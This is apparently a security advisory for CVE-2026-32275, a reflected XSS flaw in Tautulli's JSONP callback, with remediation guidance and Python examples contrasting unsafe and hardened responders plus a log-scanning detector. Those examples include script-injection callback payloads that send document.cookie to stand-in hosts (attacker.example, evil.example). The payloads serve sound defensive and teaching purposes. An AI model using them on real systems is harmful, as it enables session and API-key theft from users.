CVE-2026-32275 Overview
CVE-2026-32275 is a cross-site scripting (XSS) vulnerability in Tautulli, a Python-based monitoring and tracking tool for Plex Media Server. It affects versions 1.3.10 up to, but not including, 2.17.0. The function name supplied in the JSONP callback parameter is reflected into the API response without sanitization, which allows cross-origin script injection and theft of the Tautulli API key.
Critical Impact
An attacker who can get a Tautulli user to open a crafted link or page can have script of their choosing reflected through the JSONP callback parameter and use it to read the API key. With the key, the attacker can call the Tautulli API as that user, reading Plex monitoring data and reaching administrative functions.
Affected Products
- Tautulli versions 1.3.10 to before 2.17.0
- Plex Media Server environments using vulnerable Tautulli installations
- Self-hosted Tautulli deployments with network-exposed interfaces
Discovery Timeline
- 2026-03-30 - CVE-2026-32275 published to NVD
- 2026-04-02 - Last updated in NVD database
Technical Details for CVE-2026-32275
Vulnerability Analysis
The vulnerability is an input validation failure in Tautulli's JSONP callback handling. JSONP (JSON with Padding) is a pre-CORS technique for reading JSON across origins: the client loads the API URL with a script tag and passes a callback parameter, and the server wraps the JSON in a call to that function name so the browser executes it on arrival. The function name is therefore attacker-influenced text that ends up in a body the browser treats as executable. If it is reflected without being restricted to a plain JavaScript identifier, an attacker can close the expected function call and append markup or statements of their own, and that content runs in the victim's browser.
Exploitation requires user interaction: the victim must open an attacker-controlled link or page that directs their browser to the vulnerable Tautulli instance with a crafted callback value. The request carries whatever cookies the browser attaches for the Tautulli origin, so once the payload runs it can exfiltrate the API key, session data and Plex server configuration details that the interface exposes.
Root Cause
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), the cross-site scripting weakness class. The JSONP endpoint concatenates the callback parameter into the response body without validating it against the only thing it should ever be, a JavaScript function name, so arbitrary code fragments are reflected back to the client.
Attack Vector
The attack vector is network-based and requires user interaction. The attacker crafts a link or page that sends the victim's browser to the vulnerable Tautulli JSONP endpoint with a callback value that closes the expected function-call wrapper and continues with JavaScript of the attacker's choosing. How that reflected content executes depends on how the browser receives the response. If the victim is navigated directly to the endpoint and the body is served as HTML, or without a content type and nosniff header that stop the browser from sniffing it, the reflected script runs in the Tautulli origin with the victim's session, and the API key can be read from there. If instead the endpoint is loaded through a script tag on the attacker's page, as a JSONP consumer would load it, the response executes in the attacker's page and the JSON payload is handed to a callback the attacker defines, provided the endpoint honours the victim's session cookies for that cross-site request.
The mechanism in both cases is the same: the callback parameter is manipulated to break out of the expected function-call context and inject additional JavaScript statements. For the exact details, refer to the GitHub Security Advisory GHSA-95mg-wpqw-9qxh.
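To make the mechanism concrete, here is an added illustration in Python. It is not Tautulli's code and not the fix shipped in 2.17.0: a minimal JSONP responder that reflects the callback verbatim sits beside one that validates it. The sample payload, the attacker-supplied callback string and the single-endpoint shape are constructed for the example.

```python
import json
import re

# A JSONP callback must be a plain (optionally dotted) JavaScript identifier,
# e.g. "cb", "jQuery3_1711792862" or "window.onData".  Anything else is refused.
SAFE_CALLBACK = re.compile(r"^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$")

# Constructed sample API payload; stands in for whatever the endpoint returns.
SAMPLE_PAYLOAD = {"response": {"result": "success"}}

# Constructed attacker-supplied callback: it closes the script context the
# server expects to emit and opens a script tag of its own.
EVIL_CALLBACK = (
    "</script><script>"
    "fetch('https://attacker.example/?c='+encodeURIComponent(document.cookie))"
    "</script>//"
)


def jsonp_unsanitised(callback: str, payload: dict) -> tuple[int, dict, str]:
    """The weak pattern behind CWE-79 here: the callback name is concatenated
    into the body verbatim and the body is served as text/html.  Returns
    (status, headers, body) the way a tiny WSGI handler would."""
    body = f"{callback}({json.dumps(payload)});"
    return 200, {"Content-Type": "text/html; charset=utf-8"}, body


def jsonp_hardened(callback: str, payload: dict) -> tuple[int, dict, str]:
    """The corrected pattern: reject anything that is not an identifier, label
    the body as JavaScript, and forbid MIME sniffing so a browser that is
    navigated straight to the URL never renders the body as HTML."""
    if not SAFE_CALLBACK.match(callback):
        error = json.dumps({"error": "invalid callback"})
        return 400, {"Content-Type": "application/json"}, error
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    # The leading comment is a common JSONP defence: the body never begins
    # with attacker-chosen bytes, so it cannot be mistaken for another format.
    return 200, headers, f"/**/{callback}({json.dumps(payload)});"


def renders_as_html(headers: dict) -> bool:
    """Whether a browser navigated directly to the response would parse the
    body as a document (and run any <script> in it) rather than show it as
    text.  A deliberate simplification of real content sniffing rules."""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype == "text/html":
        return True
    # Without a declared type some browsers sniff the body; nosniff forbids
    # that, which is why the hardened variant always sets it.
    nosniff = headers.get("X-Content-Type-Options", "").lower() == "nosniff"
    return ctype == "" and not nosniff


if __name__ == "__main__":
    for name, fn in (("unsanitised", jsonp_unsanitised), ("hardened", jsonp_hardened)):
        status, headers, body = fn(EVIL_CALLBACK, SAMPLE_PAYLOAD)
        print(f"{name}: HTTP {status}, renders as HTML: {renders_as_html(headers)}")
        print("  " + body[:90])
```

Restricting the callback to an identifier closes the injection. It does not by itself stop a third-party page from loading the endpoint in a script tag and reading the JSON if the endpoint accepts the victim's session cookie for that request; whether it does is outside what this example models, which is why the API key requirement and SameSite cookie settings matter alongside the input check.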
Detection Methods for CVE-2026-32275
Indicators of Compromise
- Outbound requests from the browsers of Tautulli users (not from the Tautulli process, which never sees the exfiltration) to unknown external domains shortly after they used the Tautulli interface
- Tautulli API key usage from unfamiliar IP addresses or geographic locations
- Requests to the JSONP endpoint whose callback value contains characters that cannot appear in a JavaScript function name: angle brackets, parentheses, quotes, semicolons, slashes, or their percent-encoded forms
- JSONP requests whose Referer header names a third-party site rather than the Tautulli interface itself
Detection Strategies
- Parse reverse-proxy or web server access logs for requests carrying a callback parameter and flag any value that does not match a plain dotted identifier (letters, digits, underscore, dollar sign, dots); alert on the source IP and referer
- Set a Content Security Policy at the reverse proxy with a report-to or report-uri directive, so that inline script execution is blocked and every blocked attempt produces a report you can collect
- Deploy WAF rules that reject callback parameters failing the identifier pattern rather than enumerating XSS payload strings; an allowlist is both simpler and harder to evade
- Correlate JSONP requests with the Referer header and the session: a callback-bearing request whose referer is an external site, or which arrives with an authenticated session from an IP that has never used the web interface, deserves a look
Monitoring Recommendations
- Enable verbose logging in Tautulli for its API endpoints and review the API calls for commands and callers that do not match normal use
- Alert on API key regeneration and on unexpected changes to API authentication settings
- Monitor egress from user workstations for exfiltration to untrusted endpoints, since the stolen data leaves from the browser, not from the server
- Rate-limit the JSONP endpoint at the proxy so that automated probing of callback values is slowed and shows up as throttled requests in the logs
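As an added example that is neither a Tautulli feature nor code from the project, the detector below applies the log-parsing strategy above to access logs in Combined Log Format: it parses each request line, decodes the callback parameter (a second decoding pass catches double-encoded payloads) and flags any value that is not a plain JavaScript identifier. The log lines are constructed for the example; the /api/v2 path and the callback parameter name are assumptions about the endpoint shape.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access log (Combined Log Format); not real traffic.
# Line 1 is a normal jQuery-style JSONP request, line 2 a reflected-script
# attempt referred from an external site, line 4 a scripted probe.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Mar/2026:10:01:02 +0000] "GET /api/v2?apikey=REDACTED&cmd=get_activity&callback=jQuery3_1711792862 HTTP/1.1" 200 512 "http://127.0.0.1:8181/" "Mozilla/5.0"
198.51.100.7 - - [30/Mar/2026:10:02:15 +0000] "GET /api/v2?cmd=get_activity&callback=%3C/script%3E%3Cscript%3Efetch(%27https://evil.example/%3F%27%2Bdocument.cookie)%3C/script%3E HTTP/1.1" 200 233 "https://evil.example/" "Mozilla/5.0"
203.0.113.5 - - [30/Mar/2026:10:03:44 +0000] "GET /home HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Mar/2026:10:04:10 +0000] "GET /api/v2?cmd=get_activity&callback=alert(document.domain)// HTTP/1.1" 200 233 "-" "curl/8.0"
"""

# Combined Log Format: ip ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# The only legitimate shape of a JSONP callback: a dotted JavaScript identifier.
SAFE_CALLBACK = re.compile(r"^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$")


def extract_callbacks(target: str) -> list[str]:
    """Return every callback value in the request target, fully decoded.
    parse_qs decodes once; the extra unquote() undoes a second layer of
    percent-encoding an attacker might use to slip past a proxy filter.
    Over-decoding is acceptable for detection, where a false positive is cheap."""
    query = urlsplit(target).query
    return [unquote(v) for v in parse_qs(query).get("callback", [])]


def scan_access_log(text: str) -> list[dict]:
    """Flag every request whose callback is not a plain identifier."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        for cb in extract_callbacks(m["target"]):
            if not SAFE_CALLBACK.match(cb):
                findings.append({
                    "ts": m["ts"],
                    "ip": m["ip"],
                    "status": m["status"],
                    "referer": m["referer"],
                    "callback": cb,
                })
    return findings


def by_source(findings: list[dict]) -> dict[str, int]:
    """Count suspicious callback requests per source IP, for alert triage."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG)
    for hit in hits:
        print(f"{hit['ts']} {hit['ip']} referer={hit['referer']!r} callback={hit['callback']!r}")
    print("per source:", by_source(hits))
```

Run it against a real proxy log by reading the file into scan_access_log; the response status is kept in each finding so that a 200 on a malformed callback (the reflection succeeded) can be ranked above a 400 from an already hardened instance.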
How to Mitigate CVE-2026-32275
Immediate Actions Required
- Upgrade Tautulli to version 2.17.0 or later immediately
- Rotate the Tautulli API key if a vulnerable version ran while reachable from untrusted networks; a key read through this bug remains valid after the upgrade until it is regenerated
- Review access logs for JSONP requests with malformed callback values and for API key use from unexpected sources
- Restrict network access to the Tautulli interface to trusted networks only
Patch Information
Tautulli has addressed this vulnerability in version 2.17.0. The fix implements proper sanitization of the JSONP callback parameter to prevent script injection. Users should update immediately by downloading the latest release from the Tautulli Release v2.17.0 page or using their package manager's update mechanism.
For additional details about this security issue, consult the GitHub Security Advisory GHSA-95mg-wpqw-9qxh.
Workarounds
- Place Tautulli behind a reverse proxy that rejects any request whose callback parameter is not a plain JavaScript identifier; if no legitimate client uses JSONP, have the proxy drop requests that carry a callback parameter at all
- Bind Tautulli to localhost only and reach it remotely over an SSH tunnel or VPN
- Apply network-level access controls (firewall rules, VPN-only exposure) to limit which clients can reach the web interface at all
- Treat these as exposure reduction only: a user on the trusted network who opens an attacker's link is still affected until the upgrade is applied
# Example: Restrict Tautulli access to localhost only in config.ini
[General]
http_host = 127.0.0.1
http_port = 8181
# Use SSH tunnel or VPN for remote access
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.